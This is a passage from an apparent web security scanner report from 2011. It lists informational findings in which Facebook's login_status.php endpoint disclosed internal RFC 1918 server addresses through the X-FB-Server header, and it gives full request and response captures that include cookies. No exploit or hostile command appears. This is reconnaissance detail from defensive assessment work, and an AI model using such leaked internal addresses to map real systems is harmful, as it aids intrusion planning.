GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b43d93f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15c45a4c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11b0283e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df218e5a1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1152b3d48%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f218e5a1c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff24dfacf7c&relation=parent&transport=postmessage&frame=f396151acc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.32.23
X-Cnection: close
Date: Thu, 05 May 2011 01:47:31 GMT
Content-Length: 0


20.155. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.142.118

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12cbfaaf4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10041f864%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36c6c0654%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25360361%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c6edd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f25360361&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1b17e1318&relation=parent&transport=postmessage&frame=f3bba9da4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.118
X-Cnection: close
Date: Thu, 05 May 2011 02:02:48 GMT
Content-Length: 0


20.156. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.74.67

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20ff4284%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1877027d4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df987fd1d%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ef03cc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df106755564%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f11ef03cc&origin=http%3A%2F%2Ftechcrunch.com%2Ff208209ea4&relation=parent&transport=postmessage&frame=f177f7c498
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.74.67
X-Cnection: close
Date: Thu, 05 May 2011 00:58:34 GMT
Content-Length: 0


20.157. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.143.121

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df411ae6bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29cbceaac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21d1319c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3602fda58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df634100a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3602fda58&origin=http%3A%2F%2Faol.sportingnews.com%2Ff33cefee98&relation=parent&transport=postmessage&frame=fceba352
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.143.121
X-Cnection: close
Date: Thu, 05 May 2011 01:14:01 GMT
Content-Length: 0


20.158. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.151.43

Request

GET /extern/login_status.php?api_key=47c6f1cfdf79ef9c669f1beb89b3e598&app_id=47c6f1cfdf79ef9c669f1beb89b3e598&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4b99ee0%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe25b524c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27fcb7b5c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df38b20c288%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37906661%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f38b20c288&origin=http%3A%2F%2Fwww.truveo.com%2Ff192839764&relation=parent&transport=postmessage&frame=f11f5dcd84
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.43
X-Cnection: close
Date: Thu, 05 May 2011 11:42:06 GMT
Content-Length: 0


20.159. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.82.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33b771228%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df205a07884%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df234b0a5fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df916fd9e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a3dadc24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f916fd9e&origin=http%3A%2F%2Faol.sportingnews.com%2Ff15745654&relation=parent&transport=postmessage&frame=f378903e6
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.82.25
X-Cnection: close
Date: Thu, 05 May 2011 01:50:07 GMT
Content-Length: 0


20.160. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.170.35

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe30beb68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33e06d948%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33a0f8d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d589a038%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e6c23abc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d589a038&origin=http%3A%2F%2Faol.sportingnews.com%2Ff318830124&relation=parent&transport=postmessage&frame=f24301464c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.35
X-Cnection: close
Date: Thu, 05 May 2011 01:22:29 GMT
Content-Length: 0


20.161. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.123.118

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20dc7d7bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37613e56c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20f33d92c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa178d9f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e39f71a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fa178d9f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff137db79dc&relation=parent&transport=postmessage&frame=f27c094b1
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.123.118
X-Cnection: close
Date: Thu, 05 May 2011 01:16:37 GMT
Content-Length: 0


20.162. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.116.45

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4a7247e4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e20e9ad4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6192d57%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21f258edc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33cceefa%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f21f258edc&origin=http%3A%2F%2Ftechcrunch.com%2Ff208209ea4&relation=parent&transport=postmessage&frame=f1f5d23bcc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.116.45
X-Cnection: close
Date: Thu, 05 May 2011 00:58:58 GMT
Content-Length: 0


20.163. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.68.111

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33ea9cee%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df140b37b6%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfdf5b1a5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ea1d5d78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df143798ff%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
